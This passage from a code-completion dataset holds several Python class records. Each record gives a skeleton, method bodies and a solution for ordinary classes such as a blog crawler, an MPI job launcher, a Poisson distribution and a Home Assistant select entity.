fail')\n self.output.to_html()\n<|end_body_1|>\n", "revision_id": "345e34fff7386d91acbb03a01fd4127c5dfed037", "skeleton": "<|skeleton|>\nclass Scheduler:\n\n def __init__(self):\n \"\"\"初始化调度器\"\"\"\n <|body_0|>\n\n def crawler(self, root_url):\n \"\"\"根据入口文件,开始爬取需要的内容和urls :param root_url: :return:\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Scheduler:\n def __init__(self):\n \"\"\"初始化调度器\"\"\"\n self.urls = urls.Urls()\n self.parserHTML = Parser()\n self.output = Output()\n\n def crawler(self, root_url):\n \"\"\"根据入口文件,开始爬取需要的内容和urls :param root_url: :return:\"\"\"\n self.urls.add_new_url(root_url)\n while self.urls.get_new_urls_length() > 0:\n try:\n url = self.urls.get_new_url()\n flag, content = download.download(url)\n if flag:\n links, datas = self.parserHTML.parser_html(url, content)\n self.urls.add_new_urls(links)\n self.output.store_datas(datas)\n else:\n print(content)\n except Exception as e:\n print(e, 'crawler fail')\n self.output.to_html()\n", "source": "the_stack_v2_python_sparse", "source_path": "projects/crawler_for_blogs/crawler_blogs.py", "source_repo": "ice-melt/python_code_manager", "split": "test", "star_events_count": 0} {"blob_id": "f17eac5a734194eba918cb8a2185f3505e4f5e9f", "bodies": ["if self.auto:\n try:\n application.pyre_mpi(*args, **kwds)\n except AttributeError:\n pass\n return self.spawn(*args, application=application, **kwds)\nreturn self.parallel(*args, application=application, **kwds)", "import mpi\nif mpi.init():\n self.world = mpi.world\n return super().launch(*args, **kwds)\nimport journal\nchannel = journal.error('mpi.init')\nchannel.log('failed to initialize the mpi runtime support')\nreturn 1", "argv = self.buildCommandLine()\noptions = {'args': argv, 'universal_newlines': True, 'shell': False}\nstatus = 42\nwith subprocess.Popen(**options) as child:\n status = child.wait()\nreturn status", "launcher = self.mpi.launcher\ninterpreter = sys.executable\nhosts = self.hosts\ntasks = self.tasks\nhostfile = self.hostfile\nextra = self.extra\nargv = [launcher]\nargv += ['-n', str(hosts * tasks)]\nif hostfile:\n argv += ['--hostfile', str(hostfile)]\nif extra:\n argv += extra.split()\nargv += [interpreter]\nargv += sys.argv\nargv += [f'--shell.hosts={hosts}', f'--shell.tasks={tasks}']\nargv += [f'--shell.auto=no']\nreturn argv"], "bodies_text": "<|body_start_0|>\n if self.auto:\n try:\n application.pyre_mpi(*args, **kwds)\n except AttributeError:\n pass\n return self.spawn(*args, application=application, **kwds)\n return self.parallel(*args, application=application, **kwds)\n<|end_body_0|>\n\n<|body_start_1|>\n import mpi\n if mpi.init():\n self.world = mpi.world\n return super().launch(*args, **kwds)\n import journal\n channel = journal.error('mpi.init')\n channel.log('failed to initialize the mpi runtime support')\n return 1\n<|end_body_1|>\n\n<|body_start_2|>\n argv = self.buildCommandLine()\n options = {'args': argv, 'universal_newlines': True, 'shell': False}\n status = 42\n with subprocess.Popen(**options) as child:\n status = child.wait()\n return status\n<|end_body_2|>\n\n<|body_start_3|>\n launcher = self.mpi.launcher\n interpreter = sys.executable\n hosts = self.hosts\n tasks = self.tasks\n hostfile = self.hostfile\n extra = self.extra\n argv = [launcher]\n argv += ['-n', str(hosts * tasks)]\n if hostfile:\n argv += ['--hostfile', str(hostfile)]\n if extra:\n argv += extra.split()\n argv += [interpreter]\n argv += sys.argv\n argv += [f'--shell.hosts={hosts}', f'--shell.tasks={tasks}']\n argv += [f'--shell.auto=no']\n return argv\n<|end_body_3|>\n", "class_docstring": "Encapsulation of launching an MPI job using {mpirun}", "class_name": "Launcher", "detected_licenses": ["BSD-3-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Launcher:\n \"\"\"Encapsulation of launching an MPI job using {mpirun}\"\"\"\n\n def launch(self, application, *args, **kwds):\n \"\"\"Launch {application} as a collection of mpi tasks\"\"\"\n <|body_0|>\n\n def parallel(self, *args, **kwds):\n \"\"\"Called after the parallel machine has been built and it is time to invoke the user's code in every node\"\"\"\n <|body_1|>\n\n def spawn(self, application, *args, **kwds):\n \"\"\"Invoke {mpirun} with the correct arguments to create the parallel machine\"\"\"\n <|body_2|>\n\n def buildCommandLine(self):\n \"\"\"Construct the mpirun command line\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if self.auto:\n try:\n application.pyre_mpi(*args, **kwds)\n except AttributeError:\n pass\n return self.spawn(*args, application=application, **kwds)\n return self.parallel(*args, application=application, **kwds)\n<|end_body_0|>\n\n<|body_start_1|>\n import mpi\n if mpi.init():\n self.world = mpi.world\n return super().launch(*args, **kwds)\n import journal\n channel = journal.error('mpi.init')\n channel.log('failed to initialize the mpi runtime support')\n return 1\n<|end_body_1|>\n\n<|body_start_2|>\n argv = self.buildCommandLine()\n options = {'args': argv, 'universal_newlines': True, 'shell': False}\n status = 42\n with subprocess.Popen(**options) as child:\n status = child.wait()\n return status\n<|end_body_2|>\n\n<|body_start_3|>\n launcher = self.mpi.launcher\n interpreter = sys.executable\n hosts = self.hosts\n tasks = self.tasks\n hostfile = self.hostfile\n extra = self.extra\n argv = [launcher]\n argv += ['-n', str(hosts * tasks)]\n if hostfile:\n argv += ['--hostfile', str(hostfile)]\n if extra:\n argv += extra.split()\n argv += [interpreter]\n argv += sys.argv\n argv += [f'--shell.hosts={hosts}', f'--shell.tasks={tasks}']\n argv += [f'--shell.auto=no']\n return argv\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000025", "length_bytes": 5102, "license_type": "permissive", "methods": [{"docstring": "Launch {application} as a collection of mpi tasks", "name": "launch", "signature": "def launch(self, application, *args, **kwds)"}, {"docstring": "Called after the parallel machine has been built and it is time to invoke the user's code in every node", "name": "parallel", "signature": "def parallel(self, *args, **kwds)"}, {"docstring": "Invoke {mpirun} with the correct arguments to create the parallel machine", "name": "spawn", "signature": "def spawn(self, application, *args, **kwds)"}, {"docstring": "Construct the mpirun command line", "name": "buildCommandLine", "signature": "def buildCommandLine(self)"}], "n_methods": 4, "prompt": "Implement the Python class `Launcher` described below.\n\nClass description:\nEncapsulation of launching an MPI job using {mpirun}\n\nMethod signatures and docstrings:\n- def launch(self, application, *args, **kwds): Launch {application} as a collection of mpi tasks\n- def parallel(self, *args, **kwds): Called after the parallel machine has been built and it is time to invoke the user's code in every node\n- def spawn(self, application, *args, **kwds): Invoke {mpirun} with the correct arguments to create the parallel machine\n- def buildCommandLine(self): Construct the mpirun command line", "prompted_full_text": "Implement the Python class `Launcher` described below.\n\nClass description:\nEncapsulation of launching an MPI job using {mpirun}\n\nMethod signatures and docstrings:\n- def launch(self, application, *args, **kwds): Launch {application} as a collection of mpi tasks\n- def parallel(self, *args, **kwds): Called after the parallel machine has been built and it is time to invoke the user's code in every node\n- def spawn(self, application, *args, **kwds): Invoke {mpirun} with the correct arguments to create the parallel machine\n- def buildCommandLine(self): Construct the mpirun command line\n\n<|skeleton|>\nclass Launcher:\n \"\"\"Encapsulation of launching an MPI job using {mpirun}\"\"\"\n\n def launch(self, application, *args, **kwds):\n \"\"\"Launch {application} as a collection of mpi tasks\"\"\"\n <|body_0|>\n\n def parallel(self, *args, **kwds):\n \"\"\"Called after the parallel machine has been built and it is time to invoke the user's code in every node\"\"\"\n <|body_1|>\n\n def spawn(self, application, *args, **kwds):\n \"\"\"Invoke {mpirun} with the correct arguments to create the parallel machine\"\"\"\n <|body_2|>\n\n def buildCommandLine(self):\n \"\"\"Construct the mpirun command line\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if self.auto:\n try:\n application.pyre_mpi(*args, **kwds)\n except AttributeError:\n pass\n return self.spawn(*args, application=application, **kwds)\n return self.parallel(*args, application=application, **kwds)\n<|end_body_0|>\n\n<|body_start_1|>\n import mpi\n if mpi.init():\n self.world = mpi.world\n return super().launch(*args, **kwds)\n import journal\n channel = journal.error('mpi.init')\n channel.log('failed to initialize the mpi runtime support')\n return 1\n<|end_body_1|>\n\n<|body_start_2|>\n argv = self.buildCommandLine()\n options = {'args': argv, 'universal_newlines': True, 'shell': False}\n status = 42\n with subprocess.Popen(**options) as child:\n status = child.wait()\n return status\n<|end_body_2|>\n\n<|body_start_3|>\n launcher = self.mpi.launcher\n interpreter = sys.executable\n hosts = self.hosts\n tasks = self.tasks\n hostfile = self.hostfile\n extra = self.extra\n argv = [launcher]\n argv += ['-n', str(hosts * tasks)]\n if hostfile:\n argv += ['--hostfile', str(hostfile)]\n if extra:\n argv += extra.split()\n argv += [interpreter]\n argv += sys.argv\n argv += [f'--shell.hosts={hosts}', f'--shell.tasks={tasks}']\n argv += [f'--shell.auto=no']\n return argv\n<|end_body_3|>\n", "revision_id": "d741c44ffb3e9e1f726bf492202ac8738bb4aa1c", "skeleton": "<|skeleton|>\nclass Launcher:\n \"\"\"Encapsulation of launching an MPI job using {mpirun}\"\"\"\n\n def launch(self, application, *args, **kwds):\n \"\"\"Launch {application} as a collection of mpi tasks\"\"\"\n <|body_0|>\n\n def parallel(self, *args, **kwds):\n \"\"\"Called after the parallel machine has been built and it is time to invoke the user's code in every node\"\"\"\n <|body_1|>\n\n def spawn(self, application, *args, **kwds):\n \"\"\"Invoke {mpirun} with the correct arguments to create the parallel machine\"\"\"\n <|body_2|>\n\n def buildCommandLine(self):\n \"\"\"Construct the mpirun command line\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Launcher:\n \"\"\"Encapsulation of launching an MPI job using {mpirun}\"\"\"\n\n def launch(self, application, *args, **kwds):\n \"\"\"Launch {application} as a collection of mpi tasks\"\"\"\n if self.auto:\n try:\n application.pyre_mpi(*args, **kwds)\n except AttributeError:\n pass\n return self.spawn(*args, application=application, **kwds)\n return self.parallel(*args, application=application, **kwds)\n\n def parallel(self, *args, **kwds):\n \"\"\"Called after the parallel machine has been built and it is time to invoke the user's code in every node\"\"\"\n import mpi\n if mpi.init():\n self.world = mpi.world\n return super().launch(*args, **kwds)\n import journal\n channel = journal.error('mpi.init')\n channel.log('failed to initialize the mpi runtime support')\n return 1\n\n def spawn(self, application, *args, **kwds):\n \"\"\"Invoke {mpirun} with the correct arguments to create the parallel machine\"\"\"\n argv = self.buildCommandLine()\n options = {'args': argv, 'universal_newlines': True, 'shell': False}\n status = 42\n with subprocess.Popen(**options) as child:\n status = child.wait()\n return status\n\n def buildCommandLine(self):\n \"\"\"Construct the mpirun command line\"\"\"\n launcher = self.mpi.launcher\n interpreter = sys.executable\n hosts = self.hosts\n tasks = self.tasks\n hostfile = self.hostfile\n extra = self.extra\n argv = [launcher]\n argv += ['-n', str(hosts * tasks)]\n if hostfile:\n argv += ['--hostfile', str(hostfile)]\n if extra:\n argv += extra.split()\n argv += [interpreter]\n argv += sys.argv\n argv += [f'--shell.hosts={hosts}', f'--shell.tasks={tasks}']\n argv += [f'--shell.auto=no']\n return argv\n", "source": "the_stack_v2_python_sparse", "source_path": "packages/mpi/Launcher.py", "source_repo": "pyre/pyre", "split": "test", "star_events_count": 27} {"blob_id": "d14e88a42aa4d1d53c01c1403d6692a8a5b6ef88", "bodies": ["if data is None and isinstance(lambtha, (float, int)):\n if lambtha <= 0:\n raise ValueError('lambtha must be a positive value')\n self.lambtha = float(lambtha)\nelif data is not None:\n if not isinstance(data, list):\n raise TypeError('data must be a list')\n if len(data) < 2:\n raise ValueError('data must contain multiple values')\n self.lambtha = float(sum(data) / len(data))", "if not isinstance(k, int):\n k = int(k)\nif k is None or k < 0:\n return 0\nreturn self.lambtha ** k * Poisson.e ** (-1 * self.lambtha) / self.fact(k)", "if k in [0, 1]:\n return 1\nreturn k * self.fact(k - 1)", "if not isinstance(k, int):\n k = int(k)\nif k is None or k < 0:\n return 0\nreturn Poisson.e ** (-1 * self.lambtha) * sum([self.lambtha ** i / self.fact(i) for i in range(0, k + 1)])"], "bodies_text": "<|body_start_0|>\n if data is None and isinstance(lambtha, (float, int)):\n if lambtha <= 0:\n raise ValueError('lambtha must be a positive value')\n self.lambtha = float(lambtha)\n elif data is not None:\n if not isinstance(data, list):\n raise TypeError('data must be a list')\n if len(data) < 2:\n raise ValueError('data must contain multiple values')\n self.lambtha = float(sum(data) / len(data))\n<|end_body_0|>\n\n<|body_start_1|>\n if not isinstance(k, int):\n k = int(k)\n if k is None or k < 0:\n return 0\n return self.lambtha ** k * Poisson.e ** (-1 * self.lambtha) / self.fact(k)\n<|end_body_1|>\n\n<|body_start_2|>\n if k in [0, 1]:\n return 1\n return k * self.fact(k - 1)\n<|end_body_2|>\n\n<|body_start_3|>\n if not isinstance(k, int):\n k = int(k)\n if k is None or k < 0:\n return 0\n return Poisson.e ** (-1 * self.lambtha) * sum([self.lambtha ** i / self.fact(i) for i in range(0, k + 1)])\n<|end_body_3|>\n", "class_docstring": "define class", "class_name": "Poisson", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Poisson:\n \"\"\"define class\"\"\"\n\n def __init__(self, data=None, lambtha=1.0):\n \"\"\"class constructor\"\"\"\n <|body_0|>\n\n def pmf(self, k):\n \"\"\"function that calculates the probability mass function for k successes\"\"\"\n <|body_1|>\n\n def fact(self, k):\n \"\"\"function that returns the factorial of k\"\"\"\n <|body_2|>\n\n def cdf(self, k):\n \"\"\"function that calculates the cumulative distribution function for k successes\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if data is None and isinstance(lambtha, (float, int)):\n if lambtha <= 0:\n raise ValueError('lambtha must be a positive value')\n self.lambtha = float(lambtha)\n elif data is not None:\n if not isinstance(data, list):\n raise TypeError('data must be a list')\n if len(data) < 2:\n raise ValueError('data must contain multiple values')\n self.lambtha = float(sum(data) / len(data))\n<|end_body_0|>\n\n<|body_start_1|>\n if not isinstance(k, int):\n k = int(k)\n if k is None or k < 0:\n return 0\n return self.lambtha ** k * Poisson.e ** (-1 * self.lambtha) / self.fact(k)\n<|end_body_1|>\n\n<|body_start_2|>\n if k in [0, 1]:\n return 1\n return k * self.fact(k - 1)\n<|end_body_2|>\n\n<|body_start_3|>\n if not isinstance(k, int):\n k = int(k)\n if k is None or k < 0:\n return 0\n return Poisson.e ** (-1 * self.lambtha) * sum([self.lambtha ** i / self.fact(i) for i in range(0, k + 1)])\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000026", "length_bytes": 1678, "license_type": "no_license", "methods": [{"docstring": "class constructor", "name": "__init__", "signature": "def __init__(self, data=None, lambtha=1.0)"}, {"docstring": "function that calculates the probability mass function for k successes", "name": "pmf", "signature": "def pmf(self, k)"}, {"docstring": "function that returns the factorial of k", "name": "fact", "signature": "def fact(self, k)"}, {"docstring": "function that calculates the cumulative distribution function for k successes", "name": "cdf", "signature": "def cdf(self, k)"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_002762", "prompt": "Implement the Python class `Poisson` described below.\n\nClass description:\ndefine class\n\nMethod signatures and docstrings:\n- def __init__(self, data=None, lambtha=1.0): class constructor\n- def pmf(self, k): function that calculates the probability mass function for k successes\n- def fact(self, k): function that returns the factorial of k\n- def cdf(self, k): function that calculates the cumulative distribution function for k successes", "prompted_full_text": "Implement the Python class `Poisson` described below.\n\nClass description:\ndefine class\n\nMethod signatures and docstrings:\n- def __init__(self, data=None, lambtha=1.0): class constructor\n- def pmf(self, k): function that calculates the probability mass function for k successes\n- def fact(self, k): function that returns the factorial of k\n- def cdf(self, k): function that calculates the cumulative distribution function for k successes\n\n<|skeleton|>\nclass Poisson:\n \"\"\"define class\"\"\"\n\n def __init__(self, data=None, lambtha=1.0):\n \"\"\"class constructor\"\"\"\n <|body_0|>\n\n def pmf(self, k):\n \"\"\"function that calculates the probability mass function for k successes\"\"\"\n <|body_1|>\n\n def fact(self, k):\n \"\"\"function that returns the factorial of k\"\"\"\n <|body_2|>\n\n def cdf(self, k):\n \"\"\"function that calculates the cumulative distribution function for k successes\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if data is None and isinstance(lambtha, (float, int)):\n if lambtha <= 0:\n raise ValueError('lambtha must be a positive value')\n self.lambtha = float(lambtha)\n elif data is not None:\n if not isinstance(data, list):\n raise TypeError('data must be a list')\n if len(data) < 2:\n raise ValueError('data must contain multiple values')\n self.lambtha = float(sum(data) / len(data))\n<|end_body_0|>\n\n<|body_start_1|>\n if not isinstance(k, int):\n k = int(k)\n if k is None or k < 0:\n return 0\n return self.lambtha ** k * Poisson.e ** (-1 * self.lambtha) / self.fact(k)\n<|end_body_1|>\n\n<|body_start_2|>\n if k in [0, 1]:\n return 1\n return k * self.fact(k - 1)\n<|end_body_2|>\n\n<|body_start_3|>\n if not isinstance(k, int):\n k = int(k)\n if k is None or k < 0:\n return 0\n return Poisson.e ** (-1 * self.lambtha) * sum([self.lambtha ** i / self.fact(i) for i in range(0, k + 1)])\n<|end_body_3|>\n", "revision_id": "7d3b348aec3b20da25b162b71f150c87c7c28d71", "skeleton": "<|skeleton|>\nclass Poisson:\n \"\"\"define class\"\"\"\n\n def __init__(self, data=None, lambtha=1.0):\n \"\"\"class constructor\"\"\"\n <|body_0|>\n\n def pmf(self, k):\n \"\"\"function that calculates the probability mass function for k successes\"\"\"\n <|body_1|>\n\n def fact(self, k):\n \"\"\"function that returns the factorial of k\"\"\"\n <|body_2|>\n\n def cdf(self, k):\n \"\"\"function that calculates the cumulative distribution function for k successes\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Poisson:\n \"\"\"define class\"\"\"\n\n def __init__(self, data=None, lambtha=1.0):\n \"\"\"class constructor\"\"\"\n if data is None and isinstance(lambtha, (float, int)):\n if lambtha <= 0:\n raise ValueError('lambtha must be a positive value')\n self.lambtha = float(lambtha)\n elif data is not None:\n if not isinstance(data, list):\n raise TypeError('data must be a list')\n if len(data) < 2:\n raise ValueError('data must contain multiple values')\n self.lambtha = float(sum(data) / len(data))\n\n def pmf(self, k):\n \"\"\"function that calculates the probability mass function for k successes\"\"\"\n if not isinstance(k, int):\n k = int(k)\n if k is None or k < 0:\n return 0\n return self.lambtha ** k * Poisson.e ** (-1 * self.lambtha) / self.fact(k)\n\n def fact(self, k):\n \"\"\"function that returns the factorial of k\"\"\"\n if k in [0, 1]:\n return 1\n return k * self.fact(k - 1)\n\n def cdf(self, k):\n \"\"\"function that calculates the cumulative distribution function for k successes\"\"\"\n if not isinstance(k, int):\n k = int(k)\n if k is None or k < 0:\n return 0\n return Poisson.e ** (-1 * self.lambtha) * sum([self.lambtha ** i / self.fact(i) for i in range(0, k + 1)])\n", "source": "the_stack_v2_python_sparse", "source_path": "math/0x03-probability/poisson.py", "source_repo": "dacastanogo/holbertonschool-machine_learning", "split": "test", "star_events_count": 0} {"blob_id": "da1d2eda97be2578ba2f29834122b116e3c305f3", "bodies": ["super().__init__(coordinator, entry, system_zone_id, zone_data)\nself._attr_name = f'{zone_data[AZD_NAME]} {description.name}'\nself._attr_unique_id = f'{self._attr_unique_id}_{system_zone_id}_{description.key}'\nself.entity_description = description\nself.values_dict = {v: k for k, v in description.options_dict.items()}\nself._async_update_attrs()", "param = self.entity_description.api_param\nvalue = self.entity_description.options_dict[option]\nawait self._async_update_hvac_params({param: value})"], "bodies_text": "<|body_start_0|>\n super().__init__(coordinator, entry, system_zone_id, zone_data)\n self._attr_name = f'{zone_data[AZD_NAME]} {description.name}'\n self._attr_unique_id = f'{self._attr_unique_id}_{system_zone_id}_{description.key}'\n self.entity_description = description\n self.values_dict = {v: k for k, v in description.options_dict.items()}\n self._async_update_attrs()\n<|end_body_0|>\n\n<|body_start_1|>\n param = self.entity_description.api_param\n value = self.entity_description.options_dict[option]\n await self._async_update_hvac_params({param: value})\n<|end_body_1|>\n", "class_docstring": "Define an Airzone Zone select.", "class_name": "AirzoneZoneSelect", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass AirzoneZoneSelect:\n \"\"\"Define an Airzone Zone select.\"\"\"\n\n def __init__(self, coordinator: AirzoneUpdateCoordinator, description: AirzoneSelectDescription, entry: ConfigEntry, system_zone_id: str, zone_data: dict[str, Any]) -> None:\n \"\"\"Initialize.\"\"\"\n <|body_0|>\n\n async def async_select_option(self, option: str) -> None:\n \"\"\"Change the selected option.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(coordinator, entry, system_zone_id, zone_data)\n self._attr_name = f'{zone_data[AZD_NAME]} {description.name}'\n self._attr_unique_id = f'{self._attr_unique_id}_{system_zone_id}_{description.key}'\n self.entity_description = description\n self.values_dict = {v: k for k, v in description.options_dict.items()}\n self._async_update_attrs()\n<|end_body_0|>\n\n<|body_start_1|>\n param = self.entity_description.api_param\n value = self.entity_description.options_dict[option]\n await self._async_update_hvac_params({param: value})\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000027", "length_bytes": 4946, "license_type": "permissive", "methods": [{"docstring": "Initialize.", "name": "__init__", "signature": "def __init__(self, coordinator: AirzoneUpdateCoordinator, description: AirzoneSelectDescription, entry: ConfigEntry, system_zone_id: str, zone_data: dict[str, Any]) -> None"}, {"docstring": "Change the selected option.", "name": "async_select_option", "signature": "async def async_select_option(self, option: str) -> None"}], "n_methods": 2, "prompt": "Implement the Python class `AirzoneZoneSelect` described below.\n\nClass description:\nDefine an Airzone Zone select.\n\nMethod signatures and docstrings:\n- def __init__(self, coordinator: AirzoneUpdateCoordinator, description: AirzoneSelectDescription, entry: ConfigEntry, system_zone_id: str, zone_data: dict[str, Any]) -> None: Initialize.\n- async def async_select_option(self, option: str) -> None: Change the selected option.", "prompted_full_text": "Implement the Python class `AirzoneZoneSelect` described below.\n\nClass description:\nDefine an Airzone Zone select.\n\nMethod signatures and docstrings:\n- def __init__(self, coordinator: AirzoneUpdateCoordinator, description: AirzoneSelectDescription, entry: ConfigEntry, system_zone_id: str, zone_data: dict[str, Any]) -> None: Initialize.\n- async def async_select_option(self, option: str) -> None: Change the selected option.\n\n<|skeleton|>\nclass AirzoneZoneSelect:\n \"\"\"Define an Airzone Zone select.\"\"\"\n\n def __init__(self, coordinator: AirzoneUpdateCoordinator, description: AirzoneSelectDescription, entry: ConfigEntry, system_zone_id: str, zone_data: dict[str, Any]) -> None:\n \"\"\"Initialize.\"\"\"\n <|body_0|>\n\n async def async_select_option(self, option: str) -> None:\n \"\"\"Change the selected option.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(coordinator, entry, system_zone_id, zone_data)\n self._attr_name = f'{zone_data[AZD_NAME]} {description.name}'\n self._attr_unique_id = f'{self._attr_unique_id}_{system_zone_id}_{description.key}'\n self.entity_description = description\n self.values_dict = {v: k for k, v in description.options_dict.items()}\n self._async_update_attrs()\n<|end_body_0|>\n\n<|body_start_1|>\n param = self.entity_description.api_param\n value = self.entity_description.options_dict[option]\n await self._async_update_hvac_params({param: value})\n<|end_body_1|>\n", "revision_id": "80caeafcb5b6e2f9da192d0ea6dd1a5b8244b743", "skeleton": "<|skeleton|>\nclass AirzoneZoneSelect:\n \"\"\"Define an Airzone Zone select.\"\"\"\n\n def __init__(self, coordinator: AirzoneUpdateCoordinator, description: AirzoneSelectDescription, entry: ConfigEntry, system_zone_id: str, zone_data: dict[str, Any]) -> None:\n \"\"\"Initialize.\"\"\"\n <|body_0|>\n\n async def async_select_option(self, option: str) -> None:\n \"\"\"Change the selected option.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class AirzoneZoneSelect:\n \"\"\"Define an Airzone Zone select.\"\"\"\n\n def __init__(self, coordinator: AirzoneUpdateCoordinator, description: AirzoneSelectDescription, entry: ConfigEntry, system_zone_id: str, zone_data: dict[str, Any]) -> None:\n \"\"\"Initialize.\"\"\"\n super().__init__(coordinator, entry, system_zone_id, zone_data)\n self._attr_name = f'{zone_data[AZD_NAME]} {description.name}'\n self._attr_unique_id = f'{self._attr_unique_id}_{system_zone_id}_{description.key}'\n self.entity_description = description\n self.values_dict = {v: k for k, v in description.options_dict.items()}\n self._async_update_attrs()\n\n async def async_select_option(self, option: str) -> None:\n \"\"\"Change the selected option.\"\"\"\n param = self.entity_description.api_param\n value = self.entity_description.options_dict[option]\n await self._async_update_hvac_params({param: value})\n", "source": "the_stack_v2_python_sparse", "source_path": "homeassistant/components/airzone/select.py", "source_repo": "home-assistant/core", "split": "test", "star_events_count": 35501} {"blob_id": "61d45856e9086d995d36a317c86d342465370442", "bodies": ["assert isinstance(display_fn_name, str), '\"display_fn_name\" must be provided as a string.'\nactive_identifying_session_ctx = self.sess.get_context()\ndisplay_subcontext = IdentifyingContext(display_fn_name=display_fn_name, **kwargs)\nreturn active_identifying_session_ctx.merging_context('display_', display_subcontext)", "assert isinstance(display_fn_name, str), '\"display_fn_name\" must be provided as a string.'\nactive_identifying_session_ctx = self.filtered_contexts[filtered_session_name]\ndisplay_subcontext = IdentifyingContext(display_fn_name=display_fn_name, **kwargs)\nreturn active_identifying_session_ctx.merging_context('display_', display_subcontext)", "from pyphoplacecellanalysis.General.Mixins.ExportHelpers import build_and_write_to_file\nactive_out_figure_paths = build_and_write_to_file(fig, final_context, self.get_output_manager(), write_vector_format=write_vector_format, write_png=write_png, register_output_file_fn=self.register_output_file)\nreturn (active_out_figure_paths, final_context)", "def conform_to_implementing_method(func):\n \"\"\" captures 'obj', 'cls'\"\"\"\n setattr(type(obj), func.__name__, func)\nconform_to_implementing_method(cls.build_display_context_for_session)\nconform_to_implementing_method(cls.build_display_context_for_filtered_session)\nconform_to_implementing_method(cls.output_figure)"], "bodies_text": "<|body_start_0|>\n assert isinstance(display_fn_name, str), '\"display_fn_name\" must be provided as a string.'\n active_identifying_session_ctx = self.sess.get_context()\n display_subcontext = IdentifyingContext(display_fn_name=display_fn_name, **kwargs)\n return active_identifying_session_ctx.merging_context('display_', display_subcontext)\n<|end_body_0|>\n\n<|body_start_1|>\n assert isinstance(display_fn_name, str), '\"display_fn_name\" must be provided as a string.'\n active_identifying_session_ctx = self.filtered_contexts[filtered_session_name]\n display_subcontext = IdentifyingContext(display_fn_name=display_fn_name, **kwargs)\n return active_identifying_session_ctx.merging_context('display_', display_subcontext)\n<|end_body_1|>\n\n<|body_start_2|>\n from pyphoplacecellanalysis.General.Mixins.ExportHelpers import build_and_write_to_file\n active_out_figure_paths = build_and_write_to_file(fig, final_context, self.get_output_manager(), write_vector_format=write_vector_format, write_png=write_png, register_output_file_fn=self.register_output_file)\n return (active_out_figure_paths, final_context)\n<|end_body_2|>\n\n<|body_start_3|>\n def conform_to_implementing_method(func):\n \"\"\" captures 'obj', 'cls'\"\"\"\n setattr(type(obj), func.__name__, func)\n conform_to_implementing_method(cls.build_display_context_for_session)\n conform_to_implementing_method(cls.build_display_context_for_filtered_session)\n conform_to_implementing_method(cls.output_figure)\n<|end_body_3|>\n", "class_docstring": "provides functionality for saving figures to file. from pyphoplacecellanalysis.General.Pipeline.Stages.Display import PipelineWithDisplaySavingMixin", "class_name": "PipelineWithDisplaySavingMixin", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass PipelineWithDisplaySavingMixin:\n \"\"\"provides functionality for saving figures to file. from pyphoplacecellanalysis.General.Pipeline.Stages.Display import PipelineWithDisplaySavingMixin\"\"\"\n\n def build_display_context_for_session(self, display_fn_name: str, **kwargs) -> 'IdentifyingContext':\n \"\"\"builds a new display context for the session out of kwargs Usage: curr_active_pipeline.build_display_context_for_session(display_fn_name='DecodedEpochSlices', epochs='replays', decoder='long_results_obj')\"\"\"\n <|body_0|>\n\n def build_display_context_for_filtered_session(self, filtered_session_name: str, display_fn_name: str, **kwargs) -> 'IdentifyingContext':\n \"\"\"builds a new display context for a filtered session out of kwargs Usage: curr_active_pipeline.build_display_context_for_session(display_fn_name='DecodedEpochSlices', epochs='replays', decoder='long_results_obj')\"\"\"\n <|body_1|>\n\n def output_figure(self, final_context: IdentifyingContext, fig, write_vector_format: bool=False, write_png: bool=True, debug_print=True):\n \"\"\"outputs the figure using the provided context.\"\"\"\n <|body_2|>\n\n def conform(cls, obj):\n \"\"\"makes the object conform to this mixin by adding its properties. Usage: from pyphoplacecellanalysis.General.Pipeline.Stages.Computation import PipelineWithComputedPipelineStageMixin, ComputedPipelineStage from pyphoplacecellanalysis.General.Pipeline.Stages.Display import PipelineWithDisplayPipelineStageMixin, PipelineWithDisplaySavingMixin from pyphoplacecellanalysis.General.Pipeline.Stages.Filtering import FilteredPipelineMixin from pyphoplacecellanalysis.General.Pipeline.Stages.Loading import PipelineWithInputStage, PipelineWithLoadableStage from pyphoplacecellanalysis.General.Pipeline.Stages.BaseNeuropyPipelineStage import PipelineStage from pyphoplacecellanalysis.General.Pipeline.Neuropy\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n assert isinstance(display_fn_name, str), '\"display_fn_name\" must be provided as a string.'\n active_identifying_session_ctx = self.sess.get_context()\n display_subcontext = IdentifyingContext(display_fn_name=display_fn_name, **kwargs)\n return active_identifying_session_ctx.merging_context('display_', display_subcontext)\n<|end_body_0|>\n\n<|body_start_1|>\n assert isinstance(display_fn_name, str), '\"display_fn_name\" must be provided as a string.'\n active_identifying_session_ctx = self.filtered_contexts[filtered_session_name]\n 